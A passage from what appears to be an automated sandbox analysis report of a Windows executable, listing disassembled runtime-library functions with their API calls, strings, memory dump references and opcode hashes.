        • EnumSystemLocalesW.KERNEL32(0010D794,00000001,?,?,?,0010DFFF,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0010D872
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorLast$EnumLocalesSystem
        • String ID:
        • API String ID: 2417226690-0
        • Opcode ID: e7490479fc3e5d37d19c74b4d3910aab981f444c7debd622d859309394cfb0ed
        • Instruction ID: 706d38f576e94d04f3ca57e8212682ec135be87795664149714109b323f8ac9d
        • Opcode Fuzzy Hash: e7490479fc3e5d37d19c74b4d3910aab981f444c7debd622d859309394cfb0ed
        • Instruction Fuzzy Hash: 6DF0E53A70020557CB189F75EC4676ABF94FFC1764B468059EA458B690C7B19982C790
        Function 00106831 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00103469,?,20001004,00000000,00000002,?,?,00102A6B), ref: 00106865
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: InfoLocale
        • String ID:
        • API String ID: 2299586839-0
        • Opcode ID: 413d0a5b1112ef557406c0d9fc355c57c24ef1b219f48e436f73d84158f1d668
        • Instruction ID: 7d1c222930444a7d81fce64982fd01a43e133d9d165e8cc5e50494dd0276265e
        • Opcode Fuzzy Hash: 413d0a5b1112ef557406c0d9fc355c57c24ef1b219f48e436f73d84158f1d668
        • Instruction Fuzzy Hash: ECE04F3154062CBBCF162F61ED05B9E3F16EF54761F048421FD45695A0CBF18D30AAD4
        Function 000F7E25 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
        Download Yara Rule
        APIs
        • SetUnhandledExceptionFilter.KERNEL32(Function_00007E31,000F72C3), ref: 000F7E2A
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled
        • String ID:
        • API String ID: 3192549508-0
        • Opcode ID: b0de901b33566082f9b44db74807f38a5dc7e516364e0f2b95817ecfe509f86f
        • Instruction ID: e0e16f75adc760a02ad5d74ddeb48d86b59c78b044628e01a2a08ad3fcb7f57c
        • Opcode Fuzzy Hash: b0de901b33566082f9b44db74807f38a5dc7e516364e0f2b95817ecfe509f86f
        • Instruction Fuzzy Hash:
        Function 0010E15F Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
        Download Yara Rule
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: HeapProcess
        • String ID:
        • API String ID: 54951025-0
        • Opcode ID: c967c3291b164d5e17a932d95da737f97633090c6f06166ff89a5cf014e3aa70
        • Instruction ID: b299b030ab19fd877f93d1650d2bf29ef39aa1d8af5f109de6900fde39c0cd97
        • Opcode Fuzzy Hash: c967c3291b164d5e17a932d95da737f97633090c6f06166ff89a5cf014e3aa70
        • Instruction Fuzzy Hash: F7A01130202200CB83028F30AB0820A3AAABB882C030880A8A008C8AA0EA3080C0AA00
        Function 000F3D50 Relevance: .4, Instructions: 379COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: a053df47e1f7a8b2c53f1fac2e431e5c3a136374f9f2535a01469136b2c20db2
        • Instruction ID: c32a2049de485bad157fa29d2ff860fdddd069901e40a545a514defbb4e20f53
        • Opcode Fuzzy Hash: a053df47e1f7a8b2c53f1fac2e431e5c3a136374f9f2535a01469136b2c20db2
        • Instruction Fuzzy Hash: 4CD1AE329087449FC314DF28C84196FFBE5BFC8750F044A2DFA99A7651E730EA449B92
        Function 00106B35 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 23ebd0bd5e6436c6e2895a3075ff04c1db8902bf7fd9e8bc258d8b36fe32f176
        • Instruction ID: 17e289a118421a489eca110e579cbfe90e690adc347acf345b9b9dd363867856
        • Opcode Fuzzy Hash: 23ebd0bd5e6436c6e2895a3075ff04c1db8902bf7fd9e8bc258d8b36fe32f176
        • Instruction Fuzzy Hash: 72E08CB2A11228EBCB18DB8CC904D8AF3ECEB48B40B254096B501D3140C7B0DF10C7D0
        Function 00101FC4 Relevance: .0, Instructions: 12COMMONLIBRARYCODE
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d4d8b999291919f67ab95172bb40c1622bcef9bcb7b93c8f6f6cac1d49c48351
        • Instruction ID: d9dda17d0da3508dfa134239d5ffd0d66d93b0cde75760cf4ca381797a2a9d41
        • Opcode Fuzzy Hash: d4d8b999291919f67ab95172bb40c1622bcef9bcb7b93c8f6f6cac1d49c48351
        • Instruction Fuzzy Hash: DAC08C3460190096CE2989108275BA833A4B3A1B82F80048CD8824B6C2C7DE9C8AD640
        Function 000F1EE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 144COMMON
        Download Yara Rule
        APIs
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F1EF5
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F1F0F
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F1F30
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F1F88
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F1FCD
        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 000F201E
        • __Getctype.LIBCPMT ref: 000F2035
        • std::_Facet_Register.LIBCPMT ref: 000F205F
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F2078
          • Part of subcall function 000F50AA: std::invalid_argument::invalid_argument.LIBCONCRT ref: 000F50B6
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeLocinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
        • String ID: bad locale name
        • API String ID: 2137871723-1405518554
        • Opcode ID: df8a8c2af9dcf0876ad8cbdccc33e35db10b7a92b745752173f3ac70c38815a1
        • Instruction ID: 39e2b304a6de22bbd6be54799d150855d07b6619a48a32a687985f3a4fd4d67d
        • Opcode Fuzzy Hash: df8a8c2af9dcf0876ad8cbdccc33e35db10b7a92b745752173f3ac70c38815a1
        • Instruction Fuzzy Hash: F541D232504348CFC360DF18D880BBAB7E0AF95710F15456DFA849BA52DB71E98ADB92
        Function 000F20A0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132COMMON
        Download Yara Rule
        APIs
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F20B2
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F20CF
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F20F0
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F214B
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F218C
        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 000F21CF
        • std::_Facet_Register.LIBCPMT ref: 000F21F8
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F2211
          • Part of subcall function 000F50AA: std::invalid_argument::invalid_argument.LIBCONCRT ref: 000F50B6
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Locinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
        • String ID: bad locale name
        • API String ID: 3096327801-1405518554
        • Opcode ID: fbbbd93b22332084425e9eebdc82b2a7b86bc1e5519c8cc6f8d41547d8ad2bb3
        • Instruction ID: 5d549bdbb9fa9a43c254bdb537810d18db877049033289357052a7bc3b0d9594
        • Opcode Fuzzy Hash: fbbbd93b22332084425e9eebdc82b2a7b86bc1e5519c8cc6f8d41547d8ad2bb3
        • Instruction Fuzzy Hash: 9641E4729043488FC360DF24D8809ABB7E0BF94710F05456DEB859B652DB30ED4ADB93
        Function 000F2FB0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 128COMMON
        Download Yara Rule
        APIs
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F3011
        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 000F3058
        • Concurrency::cancel_current_task.LIBCPMT ref: 000F311A
        • Concurrency::cancel_current_task.LIBCPMT ref: 000F311F
        • Concurrency::cancel_current_task.LIBCPMT ref: 000F3124
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
        • String ID: bad locale name$false$true
        • API String ID: 164343898-1062449267
        • Opcode ID: de1cdceaf1d3adaa6ce46866bdb5b076bba300b541f89b11b22f6700d8151cad
        • Instruction ID: 0f97c90ca6fc149848d156eebad7df5196e7e7bea4833e07db14d29b17beba8a
        • Opcode Fuzzy Hash: de1cdceaf1d3adaa6ce46866bdb5b076bba300b541f89b11b22f6700d8151cad
        • Instruction Fuzzy Hash: FC41F3715047489FC324DF2488817ABBBE0BF84710F44492EF7989BA53EB70DA49DB92
        Function 000F7152 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON
        Download Yara Rule
        APIs
        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000F7158
        • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 000F7166
        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 000F7177
        • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 000F7188
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: AddressProc$HandleModule
        • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
        • API String ID: 667068680-1247241052
        • Opcode ID: 820dba2e5e30547551ffb61c860a53572bba07222c393cf08a1e3d3397b9a475
        • Instruction ID: 903a8f9013c098b5d0bd95e58552b8083de8f658fd4f897a81b6dc3ef63e2555
        • Opcode Fuzzy Hash: 820dba2e5e30547551ffb61c860a53572bba07222c393cf08a1e3d3397b9a475
        • Instruction Fuzzy Hash: 5FE0EC31A51720EBC309AFF0BD1D9DA3ABABB4E7413848426F405D2960DB7684C0CBE0
        Function 000FA918 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • type_info::operator==.LIBVCRUNTIME ref: 000FAA37
        • ___TypeMatch.LIBVCRUNTIME ref: 000FAB45
        • _UnwindNestedFrames.LIBCMT ref: 000FAC97
        • CallUnexpected.LIBVCRUNTIME ref: 000FACB2
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
        • String ID: csm$csm$csm
        • API String ID: 2751267872-393685449
        • Opcode ID: bf7dd03c1e88dc134e0d2fe369dd922398ad6611efed803e9d8a354067b32abd
        • Instruction ID: 7736ad3eea8c431108f03eb362fa0c4b4f6ccd465d64369ac8cf03db9ead8f80
        • Opcode Fuzzy Hash: bf7dd03c1e88dc134e0d2fe369dd922398ad6611efed803e9d8a354067b32abd
        • Instruction Fuzzy Hash: DDB16BB1A0020DDFCF19DF94C9819BEB7B5FF0A310B144159EA096BA12D731EA51EF92
        Function 00109C65 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID: 0-3907804496
        • Opcode ID: 4f7af0308dec2e945f6ab25d1ce9185cd3484aff365a3f99953acbd528bfcd3b
        • Instruction ID: 9d64076e6313ec84943ace115e7bd256239aa53b984c01eaf67e576cfa782d61
        • Opcode Fuzzy Hash: 4f7af0308dec2e945f6ab25d1ce9185cd3484aff365a3f99953acbd528bfcd3b
        • Instruction Fuzzy Hash: AAB1C570E0424AEFDB15DF99C8A0BBE7BB1AF99300F144155E5859B2D3C7B09D82CBA1
        Function 00112504 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • GetCPInfo.KERNEL32(007654A0,007654A0,?,7FFFFFFF,?,001127D4,007654A0,007654A0,?,007654A0,?,?,?,?,007654A0,?), ref: 001125AA
        • __alloca_probe_16.LIBCMT ref: 00112665
        • __alloca_probe_16.LIBCMT ref: 001126F4
        • __freea.LIBCMT ref: 0011273F
        • __freea.LIBCMT ref: 00112745
        • __freea.LIBCMT ref: 0011277B
        • __freea.LIBCMT ref: 00112781
        • __freea.LIBCMT ref: 00112791
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: __freea$__alloca_probe_16$Info
        • String ID:
        • API String ID: 127012223-0
        • Opcode ID: b66c7ab4c8f7fde0a8c042af85befed9fb5e63a7720f108db884cf51f2c03ba8
        • Instruction ID: 37adc720260115c6e41efe65aafd8504a513bd4bcb9a668b3170c03fb9dbebea
        • Opcode Fuzzy Hash: b66c7ab4c8f7fde0a8c042af85befed9fb5e63a7720f108db884cf51f2c03ba8
        • Instruction Fuzzy Hash: 4571D672A042096BDF299F548C81BFF77AAAF59310F250139E904A72D2EB75DCA0C760
        Function 000F6E28 Relevance: 12.2, APIs: 8, Instructions: 175COMMON
        Download Yara Rule
        APIs
        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 000F6E71
        • __alloca_probe_16.LIBCMT ref: 000F6E9D
        • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 000F6EDC
        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000F6EF9
        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 000F6F38
        • __alloca_probe_16.LIBCMT ref: 000F6F55
        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000F6F97
        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 000F6FBA
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ByteCharMultiStringWide$__alloca_probe_16
        • String ID:
        • API String ID: 2040435927-0
        • Opcode ID: e4c8d1804b867ab2a800d3458e0353cefb8f76b9f042fe88565c7573b015881b
        • Instruction ID: 5ef3842f35ceaa7518c010b3183cca3bd101b297d6472c30721e36b0b0c0477c
        • Opcode Fuzzy Hash: e4c8d1804b867ab2a800d3458e0353cefb8f76b9f042fe88565c7573b015881b
        • Instruction Fuzzy Hash: E251BF7290021EABDF209FA4DC44FBB7BBAEF44740F154424FA15D6590E7729D18EBA0
        Function 000F2230 Relevance: 9.1, APIs: 6, Instructions: 95COMMON
        Download Yara Rule
        APIs
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F223D
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F225B
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F227C
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F22CC
        • std::_Facet_Register.LIBCPMT ref: 000F22F6
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F230F
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register
        • String ID:
        • API String ID: 1858714459-0
        • Opcode ID: 1dd2cd6482709a833dd77ea445a79850265106a5f42dad28233452ca8e0c1853
        • Instruction ID: 11f8286cd7db832e8de7b627715fc000d9737b1531eba6814a53fd09fe376f05
        • Opcode Fuzzy Hash: 1dd2cd6482709a833dd77ea445a79850265106a5f42dad28233452ca8e0c1853
        • Instruction Fuzzy Hash: 9321467690421D9FC750DF14FC809BAB3A0FB80320F04066DEE4197A52DB34AE4AEBD2
        Function 000FA5AA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • GetLastError.KERNEL32(?,?,000FA5A1,000F8CDA,000F7E75), ref: 000FA5B8
        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000FA5C6
        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000FA5DF
        • SetLastError.KERNEL32(00000000,000FA5A1,000F8CDA,000F7E75), ref: 000FA631
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorLastValue___vcrt_
        • String ID:
        • API String ID: 3852720340-0
        • Opcode ID: 02496e958d624924cee234925731c0d7108c11c57b1ecd697b746d14eda55477
        • Instruction ID: 439cbad434f4d288f92bc52e646a9965c93c35c9e90c1fa63a6cc61b8b51a896
        • Opcode Fuzzy Hash: 02496e958d624924cee234925731c0d7108c11c57b1ecd697b746d14eda55477
        • Instruction Fuzzy Hash: A101F572218B196E9AA427F4AC855BA36C4DB527B5720032AF31481DE2FF924C427545
        Function 00101FE6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,429EDEEC,?,?,00000000,00113CC0,000000FF,?,00101F76,?,?,00101F4A,00000016), ref: 0010201B
        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0010202D
        • FreeLibrary.KERNEL32(00000000,?,00000000,00113CC0,000000FF,?,00101F76,?,?,00101F4A,00000016), ref: 0010204F
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: AddressFreeHandleLibraryModuleProc
        • String ID: CorExitProcess$mscoree.dll
        • API String ID: 4061214504-1276376045
        • Opcode ID: cd0252d4eca5b29e348065ded1101c79acbaad60cea02cbf120fa04663f5f353
        • Instruction ID: d042cb0ebb45781d6ea1395f7bcb15f346a5afac9224468a57e1442f6b03fb32
        • Opcode Fuzzy Hash: cd0252d4eca5b29e348065ded1101c79acbaad60cea02cbf120fa04663f5f353
        • Instruction Fuzzy Hash: 4901DB31900715EFCB158F90CD09BEE7BBEFB48750F008525F811A26D0DBB49940CB90
        Function 00107B03 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
        Download Yara Rule
        APIs
        • __alloca_probe_16.LIBCMT ref: 00107B8A
        • __alloca_probe_16.LIBCMT ref: 00107C4B
        • __freea.LIBCMT ref: 00107CB2
